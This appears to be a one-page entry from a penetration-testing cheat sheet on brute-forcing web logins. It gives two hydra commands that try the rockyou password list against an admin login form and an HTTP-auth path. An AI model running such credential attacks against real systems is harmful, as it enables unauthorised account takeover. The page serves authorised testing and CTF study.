Bruteforce authentication

hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin
hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
PreviousLogin PageNextSQL injection

Last updated